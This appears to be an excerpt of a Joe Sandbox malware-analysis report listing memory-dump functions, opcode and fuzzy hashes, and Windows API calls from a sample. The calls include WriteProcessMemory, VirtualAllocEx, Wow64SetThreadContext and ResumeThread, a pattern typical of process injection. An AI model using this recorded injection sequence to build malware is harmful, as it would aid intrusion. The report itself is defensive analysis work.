                                                  • Opcode ID: fce7140179d7eee40ca704b432160a9570957842b11f01bda065337621b256c2
                                                  • Instruction ID: 900efb464732ca44db26ef65fec9629bc5d35e16d12a6c24cfd99b12ee31bba7
                                                  • Opcode Fuzzy Hash: fce7140179d7eee40ca704b432160a9570957842b11f01bda065337621b256c2
                                                  • Instruction Fuzzy Hash: 4231C0B69002499FDB10CF9AD880ADEBBF5FF58320F14846AE919A7310D775A944CFA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,04D39EC5,?,?), ref: 04D39F77
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2451002409.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_4d30000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID: DrawText
                                                  • String ID:
                                                  • API String ID: 2175133113-0
                                                  • Opcode ID: 8b27fc47a2e7506bc100524e74062e47be01af6c4a321213eadebe34a768edb9
                                                  • Instruction ID: 72058672081cba041faaf8023c297c8b89fe6c54e3b5335cfb0d40d2dd7fb0bf
                                                  • Opcode Fuzzy Hash: 8b27fc47a2e7506bc100524e74062e47be01af6c4a321213eadebe34a768edb9
                                                  • Instruction Fuzzy Hash: B431E2B59002099FDB10CF9AD884A9EBBF4FF48320F14846AE919A7310D7B4A940CFA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 084B5B40
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2452917737.00000000084B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_84b0000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: dc5ab7c8be26e271fd7089704cb7930f085bd04242aa63eaff016bd87807b149
                                                  • Instruction ID: d72156e9e278ba12e18fd3f433631b7297ec33f231b13310b4e9bb90c30c197b
                                                  • Opcode Fuzzy Hash: dc5ab7c8be26e271fd7089704cb7930f085bd04242aa63eaff016bd87807b149
                                                  • Instruction Fuzzy Hash: E9211571900349DFDB10CFA9C885BEEBBF1FF88310F14842AE659A7250C7789954CBA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 084B5B40
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2452917737.00000000084B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_84b0000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: f8d13ddf58701412fa92cb0c842f5553d0eef5de05d56d6efea50899cfb02c32
                                                  • Instruction ID: 0064089e15a41d87005e317622a8c06d3ce3a3c30b9297eda8b48a28b5f75914
                                                  • Opcode Fuzzy Hash: f8d13ddf58701412fa92cb0c842f5553d0eef5de05d56d6efea50899cfb02c32
                                                  • Instruction Fuzzy Hash: DF2124719003499FDB10CFAAC881BDEBBF5FF88310F10842AEA18A7240C7789950CBA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00AFE22F
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2443785235.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_af0000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 21ef2b215f8e9712fde67205deef7a023e04d7ccf8f665192e6d6bc60ebd27f8
                                                  • Instruction ID: 67cd5bae2a095f090d098566a5e944c59ef34a013cd9e880a288e061aad758d2
                                                  • Opcode Fuzzy Hash: 21ef2b215f8e9712fde67205deef7a023e04d7ccf8f665192e6d6bc60ebd27f8
                                                  • Instruction Fuzzy Hash: F52105B59002489FDB10CFA9D885AEEBFF8FF48320F14801AE954A3311D778A955CF60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 084B5996
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2452917737.00000000084B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_84b0000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: c628e5e9e4b1a74df982a62a95a6f26dd258b369ae560a46614464d26c794141
                                                  • Instruction ID: c2cd08823c39163cf71e50b0e07ae10de7adee7f5262d2fdd1aae262896346a1
                                                  • Opcode Fuzzy Hash: c628e5e9e4b1a74df982a62a95a6f26dd258b369ae560a46614464d26c794141
                                                  • Instruction Fuzzy Hash: DD210471D003098FDB10DFAAC4857EEBBF4AF88324F14842ED559A7241DB78A944CBA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 084B5996
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2452917737.00000000084B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_84b0000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: f58037935a64e4a864b7c80ecd93af288b09cc2fa687ed7ba31229ac122213f6
                                                  • Instruction ID: f0051edf741e5c689bc36aa8b99909dafe9a80c5c475d7e1fa8b161642381888
                                                  • Opcode Fuzzy Hash: f58037935a64e4a864b7c80ecd93af288b09cc2fa687ed7ba31229ac122213f6
                                                  • Instruction Fuzzy Hash: 2B213471D003098FDB50CFAAC485BEEBBF1AF88324F14842ED559A7240CB789944CBA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 084B5C20
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2452917737.00000000084B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_84b0000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessRead
                                                  • String ID:
                                                  • API String ID: 1726664587-0
                                                  • Opcode ID: 33d251c5ae6759092f317f8d80935508efd42a7cb16baa87e20f8941e7827e36
                                                  • Instruction ID: 9e12e02d3afffbc6ade480f441603fbeeaeef78312625dc88b7305180b6b7f63
                                                  • Opcode Fuzzy Hash: 33d251c5ae6759092f317f8d80935508efd42a7cb16baa87e20f8941e7827e36
                                                  • Instruction Fuzzy Hash: C32114B1D003499FDB10CFAAC881BEEBBF1FF88310F10842AE518A7240C7799950CBA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 084B5C20
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2452917737.00000000084B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_84b0000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessRead
                                                  • String ID:
                                                  • API String ID: 1726664587-0
                                                  • Opcode ID: c186e59ff1f107b569bf2d7fa9f7b7c42a0feb034feb3c3ed84afcce2a6be071
                                                  • Instruction ID: 92a4fa64fc5399a992cb1f9da1810d9f0dddf11eb6ab42e6aac847b1c5818f8b
                                                  • Opcode Fuzzy Hash: c186e59ff1f107b569bf2d7fa9f7b7c42a0feb034feb3c3ed84afcce2a6be071
                                                  • Instruction Fuzzy Hash: B321E4B19003499FDB10DFAAC881BEEFBF5FF48320F10842AE559A7240D7799950DBA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00AFE22F
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2443785235.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_af0000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 85b95d19de9eac2f3a90022ba98a83dd223c5e4444a7b74b40cddd30ec21d4b5
                                                  • Instruction ID: 3ae13139f21bd56d4a24bb2f4a8a9ef073b5b939f3afd0788e0325dfc9e5d5b2
                                                  • Opcode Fuzzy Hash: 85b95d19de9eac2f3a90022ba98a83dd223c5e4444a7b74b40cddd30ec21d4b5
                                                  • Instruction Fuzzy Hash: BF21C4B5900249DFDB10CF9AD984AEEBBF8FB48320F14841AE954A3351D374A954CF65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 084B5A5E
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2452917737.00000000084B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_84b0000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 6861994aede3fc7502c8049396cbab984f394c1ff863f0905ad6bcf470d73adb
                                                  • Instruction ID: 29997029eff85d5938a2d8c41fb2544e7514afc03e86688ba47be230d78cb345
                                                  • Opcode Fuzzy Hash: 6861994aede3fc7502c8049396cbab984f394c1ff863f0905ad6bcf470d73adb
                                                  • Instruction Fuzzy Hash: 361136729002499FDB10DFA9C844BEEBFF5EF88324F24841AE559A7250C7759950CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00AFBF99,00000800,00000000,00000000), ref: 00AFC1AA
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2443785235.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_af0000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: b90337b5bd6dfbdd33fc08c031ca3f4fc36960b41499df666af865b7b5d17a7e
                                                  • Instruction ID: abd3d23dabff87451c16d382f3ee7531d9c10ccf5c113c37607a784b5198ecf5
                                                  • Opcode Fuzzy Hash: b90337b5bd6dfbdd33fc08c031ca3f4fc36960b41499df666af865b7b5d17a7e
                                                  • Instruction Fuzzy Hash: 4E1117B680430D9FDB10CF9AD544BEEFBF4EB48320F10851AE515A7201C375A955CFA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00AFBF99,00000800,00000000,00000000), ref: 00AFC1AA
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2443785235.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_af0000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: fa5b32fbf1c11d2378dc5d9731c34ace505fcdbd5a6091779936f404fdd5e5d4
                                                  • Instruction ID: ef19f51b60a1d265c9eedbe8799e73b682984dc4a67e4be70ece206d2bef33db
                                                  • Opcode Fuzzy Hash: fa5b32fbf1c11d2378dc5d9731c34ace505fcdbd5a6091779936f404fdd5e5d4
                                                  • Instruction Fuzzy Hash: 851117B68002499FDB10CF9AC944BDEFBF4EB48320F14852AE955A7201C375A545CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 084B5A5E
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2452917737.00000000084B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_84b0000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 2b0a5d448332194b5ea02a91058c3934456e402d42f9159a6eb87e33f2b40ff8
                                                  • Instruction ID: fff3bb274fbf051672cbc800427d953467e899fca09d5df149d742b47a407098
                                                  • Opcode Fuzzy Hash: 2b0a5d448332194b5ea02a91058c3934456e402d42f9159a6eb87e33f2b40ff8
                                                  • Instruction Fuzzy Hash: 331156728003499FDB10DFAAC845BDFBBF5EF88320F24841AE519A7250C775A550CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2452917737.00000000084B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_84b0000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: 1ceada3e01152fc1ef1b8d481f72a0f262b4d783c02c6d5d4157d4c40a0950aa
                                                  • Instruction ID: f3f9037c279c80d1c634a239c7890d07012f4ce8f1e5bcb98c344c5e47dd163a
                                                  • Opcode Fuzzy Hash: 1ceada3e01152fc1ef1b8d481f72a0f262b4d783c02c6d5d4157d4c40a0950aa
                                                  • Instruction Fuzzy Hash: 711125B1D003498FDB20DFAAC4457DEFBF4EF88724F24881AD519A7240CB79A944CBA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2452917737.00000000084B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_84b0000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: 13a31a72432fe349d0bfa99805a25309f2e7aa41f8db4c7e3002f9f196de479a
                                                  • Instruction ID: 85e8d07ea1b63d54211eb90a332d5e260b2c076612eac59167ae66f4be1fd945
                                                  • Opcode Fuzzy Hash: 13a31a72432fe349d0bfa99805a25309f2e7aa41f8db4c7e3002f9f196de479a
                                                  • Instruction Fuzzy Hash: C2112871D00349CFDB10DFAAC4457EEFBF5AF88324F24881AD519A7240C775A944CBA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 084BA28D
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2452917737.00000000084B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_84b0000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID: MessagePost
                                                  • String ID:
                                                  • API String ID: 410705778-0
                                                  • Opcode ID: c7be3c776f3b092c2ffc479f39b715cbeef58fa5370b650b613b02cdb64ea158
                                                  • Instruction ID: 3509ad16de4cad19bf8893331fcdab4201171c537c17f90a553e67be22494029
                                                  • Opcode Fuzzy Hash: c7be3c776f3b092c2ffc479f39b715cbeef58fa5370b650b613b02cdb64ea158
                                                  • Instruction Fuzzy Hash: 741122B58013499FCB10CF9AC585BEEBFF4EB48320F20844AE558A7711D3B5A954CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 084BA28D
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2452917737.00000000084B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_84b0000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID: MessagePost
                                                  • String ID:
                                                  • API String ID: 410705778-0
                                                  • Opcode ID: 1694f3208d44709485a1c5b96034ab7270329d973db6c04bb834e4a6d6a6dabf
                                                  • Instruction ID: f8cfdb9da57e0470e9eadc1dca8501b4c9862af82b5b699b5e8beb849d3532c0
                                                  • Opcode Fuzzy Hash: 1694f3208d44709485a1c5b96034ab7270329d973db6c04bb834e4a6d6a6dabf
                                                  • Instruction Fuzzy Hash: 0F11E0B5804359DFDB10DF9AC445BEEBBF8EB48320F20841AE558A7300D3B5A954CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00AFBF1E
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2443785235.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_af0000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: 507999b4f2483480277b5d5243270763b0e571837907ea199e340f51d38a22d0
                                                  • Instruction ID: 60850e8c8d08e180d45c2c88041a0991b47cb51e38850480eb7b1ad3bd35a9d3
                                                  • Opcode Fuzzy Hash: 507999b4f2483480277b5d5243270763b0e571837907ea199e340f51d38a22d0
                                                  • Instruction Fuzzy Hash: D411DFB6C006498FDB10CF9AD844B9EFBF4AB88324F14841AE519A7210D3B9A545CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2452662796.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_6db0000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: O};5
                                                  • API String ID: 0-3558557551
                                                  • Opcode ID: ba3a9c720cc468d5d102bb1f438cf24a1edea2553c68326be67309a8e87f89df
                                                  • Instruction ID: adea139602441f01694d4e10692635fbd035054c1ea098f04c98b68ee8d49620
                                                  • Opcode Fuzzy Hash: ba3a9c720cc468d5d102bb1f438cf24a1edea2553c68326be67309a8e87f89df
                                                  • Instruction Fuzzy Hash: 73416D70A24609DFDB84CFA9D6849AEFBB2FF89300BA09495C446A7318D735DE21CB54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2452662796.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_6db0000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9f2f4f4d9eead96d0095cfdf79897afffe6da179481ae55ca85ef86c6f2bcce9
                                                  • Instruction ID: 94818c7c1ddb124204903bc3648490c1bb7094cf7a67732171463d259a5b554a
                                                  • Opcode Fuzzy Hash: 9f2f4f4d9eead96d0095cfdf79897afffe6da179481ae55ca85ef86c6f2bcce9
                                                  • Instruction Fuzzy Hash: 9D612674D09209DFEB54CFA9D9446EEBBBAFF89300F10A029D41AA7319D7749942CF80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2452662796.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_6db0000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 52bc6a78c2391878d991c341d8d466bf0186f28e3c888e5c5dc59b889c2bd13f
                                                  • Instruction ID: 72bbbb3964d5f2d1f83d43f5892021de9372d8cb3a9fde38831df54452b8f16e
                                                  • Opcode Fuzzy Hash: 52bc6a78c2391878d991c341d8d466bf0186f28e3c888e5c5dc59b889c2bd13f
                                                  • Instruction Fuzzy Hash: 61613831A00619DFDB54DFA8C894ADDBBB1FF88350F208169E50AAB364DB71ED41CB80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2452662796.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_6db0000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 83d311401882549da11d50bb40cef4c057c022139a704dbde741f2bb112d9b6d
                                                  • Instruction ID: 867f0284cec88a70163951ecc7aa9391e0c20f3202dbdee43e70c5a256edbf2a
                                                  • Opcode Fuzzy Hash: 83d311401882549da11d50bb40cef4c057c022139a704dbde741f2bb112d9b6d
                                                  • Instruction Fuzzy Hash: 4351C031B002058FDB14DB79D8449BFBBF6EFC42647148969E42ADB355EB30DD0587A1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2452662796.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_6db0000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 40321e7fbdb722d27ddcdc7209e22a0dab24a6fd8ff4dfd1f42582e06bc86516
                                                  • Instruction ID: 126cd0b7f73de8c51a526c83731cb5262a4a42b4a38ce4f28a8252cd490e44c2
                                                  • Opcode Fuzzy Hash: 40321e7fbdb722d27ddcdc7209e22a0dab24a6fd8ff4dfd1f42582e06bc86516
                                                  • Instruction Fuzzy Hash: B9419D71A002198FDB54EFA9D8446EFBBF6FBC8250F10842AE516E7344DB349D01CBA6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2452662796.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_6db0000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 099bb33467be652419b4c25beafa968ed3ddafbce6e699482102114df54263cf
                                                  • Instruction ID: 1d7809f8784e868e87751f27e928b2f1bc4197c9e51d7aaca43bffb08884caa6
                                                  • Opcode Fuzzy Hash: 099bb33467be652419b4c25beafa968ed3ddafbce6e699482102114df54263cf
                                                  • Instruction Fuzzy Hash: 273139B1900209DFDB54DFA9D884ADEBFF5EB48320F10846AE905A7310D775A950CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2452662796.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_6db0000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f00d84bfaf7dbecc0d04137995e3fac142df05798ce698ac7acbf916604e5c0d
                                                  • Instruction ID: b48823101f27f05f7ada0b9aac02fc93d7f6ccd67c625437b36c297d3a7d5335
                                                  • Opcode Fuzzy Hash: f00d84bfaf7dbecc0d04137995e3fac142df05798ce698ac7acbf916604e5c0d
                                                  • Instruction Fuzzy Hash: 0D312974E04209DFEB48DFA9D9446EEBBB6FB59300F009129D546E3348CB34AA01CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2443185534.000000000087D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0087D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_87d000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d11e9a591763628372a19b94d54cfb4d4f100ec47ba0fedf71cd68513e610544
                                                  • Instruction ID: 3ce8d93c4dbbb0b22dfddd04752332ab0177a5140918a265dcf34127f0f356f2
                                                  • Opcode Fuzzy Hash: d11e9a591763628372a19b94d54cfb4d4f100ec47ba0fedf71cd68513e610544
                                                  • Instruction Fuzzy Hash: D7210372504344EFDB05DF14D9C0B26BF75FF88328F24C569E9098B25AC336D856CAA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2443264185.000000000088D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0088D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_88d000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: eb80cdcb75bc43b16576edc68c2484671befbda53146d5780c5d109fc3fb80fe
                                                  • Instruction ID: 06a7ffbdef936e43738242a8604f0b9f263937c2d74c4d7a114f27d25b11dac2
                                                  • Opcode Fuzzy Hash: eb80cdcb75bc43b16576edc68c2484671befbda53146d5780c5d109fc3fb80fe
                                                  • Instruction Fuzzy Hash: ED212275604704EFDB14EF14D9C0B26BB61FB84318F20C56DD90A8B292C77AD807CB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2443264185.000000000088D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0088D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_88d000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ddee8dcda59ababad74b68dcd8730be3ae70e716b71919ff33f52441ac927cb4
                                                  • Instruction ID: 68b577111404216bba1d6b2a318f186ee986d0e05baf02560070ae5e41a23986
                                                  • Opcode Fuzzy Hash: ddee8dcda59ababad74b68dcd8730be3ae70e716b71919ff33f52441ac927cb4
                                                  • Instruction Fuzzy Hash: 9521F275504304EFDB15EF14D9C0B26BBA5FB84318F20C66DE9098B292C77AE846CB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2452662796.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_6db0000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 831fd08e1c0b57f7aaceb797b47c5f60c7c3bdd5f7634f75d0ae5734556ecf80
                                                  • Instruction ID: a209de8c1e4f751b9979527e76c8961872c49189d1122ad7e86b5488dd7b187a
                                                  • Opcode Fuzzy Hash: 831fd08e1c0b57f7aaceb797b47c5f60c7c3bdd5f7634f75d0ae5734556ecf80
                                                  • Instruction Fuzzy Hash: 6411C261A19344EFDB49DB70CC46AEE7BF8DB45204F1488EAD845D3352E935DE11C721
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2452662796.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_6db0000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a6ab63a0b7e5e4945aeb7c90ac8adb3bf5b44b32cf867cade850206bd5427bc0
                                                  • Instruction ID: 7c8abe7bad883f3f7074e873a252cab653492ec5f1e5e241e9350a9ff5c188cf
                                                  • Opcode Fuzzy Hash: a6ab63a0b7e5e4945aeb7c90ac8adb3bf5b44b32cf867cade850206bd5427bc0
